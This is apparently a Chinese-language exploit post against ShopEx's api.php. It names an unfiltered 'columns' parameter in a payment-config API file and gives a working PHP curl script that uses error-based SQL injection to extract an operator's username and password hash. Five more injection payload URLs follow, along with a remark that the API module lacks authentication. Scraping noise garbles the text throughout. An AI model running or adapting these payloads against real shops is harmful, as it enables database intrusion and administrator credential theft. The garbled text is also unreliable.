|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
9 v3 @6 u+ i5 Z4 l- t% e- fcore\api\payment\1.0\api_b2b_2_0_payment_cfg.php
/ `$ k, o4 k# \4 g
% R* U8 h8 R1 U第44行 $data['columns'] 未做过滤导致注入
) @' @& S- ~1 \% g* }# t. _7 L4 ~! c( y2 d9 r
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
% p* ^! a3 R- c! N
# c8 @- U1 H4 O7 M, j4 {注射1:
# {9 G" L r+ k+ ?
" G1 T+ b; x2 Qhttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
$ g! Z) F6 T) Z1 S$ a
0 O3 M' \) j% A- s% z% l, ]注射2:
- p8 U3 |! Y* U; q' Q5 a: Mhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
) Z; x: V4 x L7 X8 T4 u+ ~8 U. A2 e: w: g- F
注射3:4 W7 W( o+ }' L
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
$ m$ K/ i6 s5 u, R注射4:
' ?- ~+ j2 d( e" A. \& @& J% }" p8 z- Q+ [. e; q9 A
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
+ X( F' z+ _! y# ?; x' g, b5 j* u) w' r: ^+ A$ V; T
4 n0 l) V) k6 v5 X/ ~% T
注射5:0 I- w$ y$ ] x1 i" n, r9 W
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx0 s c5 e4 Y7 C9 @5 \+ m
* z. Q' X# ]% J K, f1 @
0 K. E- D1 u# |# @- ^( s. \) M
Z1 o$ L6 m5 N/ x1 d3 C6 r" p9 W" y! Q% v' @9 W' R
P" C/ J: e: q/ m7 E! X: c& @
4 @) b$ ?4 i* {' r6 K: @ |
|